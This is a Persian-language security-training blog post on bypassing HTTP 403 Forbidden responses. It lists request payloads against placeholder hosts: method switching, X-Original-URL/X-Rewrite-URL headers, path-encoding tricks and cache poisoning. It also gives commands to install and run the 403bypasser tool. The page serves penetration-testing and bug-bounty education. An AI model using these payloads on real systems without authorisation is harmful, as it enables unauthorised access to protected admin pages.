• صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
 

ورود

رمز عبور را فراموش کرده اید؟

هنوز عضو نشده اید؟ عضویت در سایت
  • صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
0

هنوز هیچ محصولی خریداری نکرده اید.

وبلاگ

مرزبان بلاگ مقالات آموزشی روش های بایپس 403 Forbidden

روش های بایپس 403 Forbidden

مقالات آموزشی ، وبلاگ
ارسال شده توسط بهروز منصوری
1402/08/11
550 بازدید

سلام. بهروز منصوری هستم و با روش های بایپس 403 Forbidden در خدمتتون هستم.

روش های بایپس forbidden 403

خطای 403 Forbidden زمانی رخ می دهد که شما اجازه دسترسی به یک صفحه وب یا چیز دیگری را در وب سرور ندارید.

خیلی وقت ها پیش می آید که شما در حال پیدا کردن آسیب پذیری روی هدف خود هستید و در حین انجام دادن به عمق هدف می روید. با ارور 403 Forbidden یا Permission Denied برخورد می کنید.

حالا اگر بتوانید آن را دور بزنید، در بیشتر مواقع می توانید صفحه مدیریت هدف یا هر صفحه با اهمیت بالای دیگری را ببینید و می توانید روی آن تست نفوذ انجام دهید.

امروز روش های مختلف بایپس این ارور رو با هم کار میکنیم.

 

روش های دستی

دستکاری متد درخواست: درخواست GET را به درخواست POST تبدیل کنید.

GET /admin HTTP/1.1
Host: target.com

 

POST /admin HTTP/1.1
Host: target.com

 

نادیده گرفتن url وب سایت از طریق هدرهای غیر استاندارد: X-Original-URL & X-Rewrite-URL

GET /admin HTTP/1.1
Host: target.com

 

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

 

اضافه کردن 2e% بعد از اولین اسلش:

http://target.com/admin => 403

 

http://target.com/%2e/admin => 200

 

نقطه (.) اسلش (/) و نقطه ویرگول (;) را در URL اضافه کنید:

http://target.com/admin => 403

 

http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/.. => 200
http://target.com/;/admin => 200
http://target.com/.;/admin => 200
http://target.com//;//admin => 200

 

“..;/” را بعد از نام دایرکتوری اضافه کنید:

http://target.com/admin

 

http://target.com/admin..;/

سعی کنید بعضی از حروف URL را با حروف بزرگ بنویسید:

http://target.com/admin

http://target.com/aDmIN

 

از Web Cache Poisoning استفاده کنید:

GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin

 

دستکاری کردن ورژن HTTP

bypass 403

بایپس ارور ۴۰۳

 

بایپس اتوماتیک

ابزار 403bypasser

آموزش ابزار 403bypasser

دستورات نصب:

git clone https://github.com/yunemse48/403bypasser.git

pip install -r requirements.txt

 

دستور کار با برنامه:

python3 403bypasser.py -u https://target.com -d xyz

 

در این دستور -u برای URL مورد نظر شما و -d برای مسیری است که 403 ممنوعه را به شما نشان می دهد و می خواهید از آن عبور کنید.

بایپس ۴۰۳ با 403bypasser

بایپس ۴۰۳ با 403bypasser

 

ابزار bypass-403

ابزار دیگری که برای سرعت بخشیدن به روند بررسی بسیار مفید است، Bypass-403 است.

بایپس ارور ۴۰۳

قطعاً این ها تنها روش های بایپس 403 Forbidden نیستند و روش های دیگری نیز وجود دارد که سعی میکنم به مرور این مقاله را به روز رسانی کنم.

برچسب ها: bypass 403bypass forbiddenerror 403آسیب پذیریآموزشآموزش امنیتآموزش هکارور ۴۰۳بایپسبایپس ۴۰۳دوره آموزش هکلینوکسهک اینستاگرامهک سایتهک سیستمهک گوشیهک وای فای

قدیمی تر یافتن پارامترهای مخفی با Fuzzing
جدیدتر شماره 10 غیر رسمی

محصولات فروش ویژه
  • چطور با گزارش خوب در سایت‌های داخلی کسب درآمد کنیم؟
    کسب درآمد از طریق گزارش باگ در سایت‌های داخلی
  • دوره درک عمیق آسیب‌پذیری
    درک عمیق آسیب‌پذیری
  • مینی دوره مهندسی اجتماعی
    مینی دوره مهندسی اجتماعی
  • گزارش نویسی حرفه ای در باگ هانتینگ
    گزارش نویسی حرفه‌ای در Bug Hunting
دسته‌ها
  • رایتاپ
  • غیر رسمی
  • مقالات آموزشی
  • وبلاگ
  • ویدیوهای آموزشی
درباره ما

هدف از راه‌اندازی این سایت تلاش در جهت ورود شما به بازار کار است.افراد زیادی را میشناسیم که مشغول کارهای کارمندی هستند، شاید حتی پول نسبتا خوبی هم به دست میاورند ولی از کارشان لذت نمیبرند.

هدف ما اینجا این است که شما از کاری که علاقه‌ دارید و از انجام دادنش لذت می‌برید به صورت قانونی پول در بیاورید و نکته مهم اینجاست که حوزه هک و امنیت یک حوزه پولساز است به شرط این که راه درست را انتخاب کنید و از مسیر درست به دنبال نتیجه گرفتن باشید.

دسترسی سریع
  • دوره منتورینگ vip بهروز منصوری
  • کلوپ امنیت 1
  • کلوپ امنیت 2
  • کلوپ امنیت پیشرفته
  • دوره تست نفوذ api
  • دوره جامع اوسینت
  • دوره امنیت وردپرس
  • دوره متخصص pentest
  • رایتاپخونه
  • ارتباط با ما
  • تماس: 09126216410
  • ایمیل: mr.mansoori@yahoo.com

تمامی حقوق برای مرزبان محفوظ می باشد.

طراحی توسط مرزبان

در صورت نیاز به مشاوره می توانید فرم را تکمیل نمایید و یا با ما در ارتباط باشید.

جستجو

جستجو با زدن Enter و بستن با زدن ESC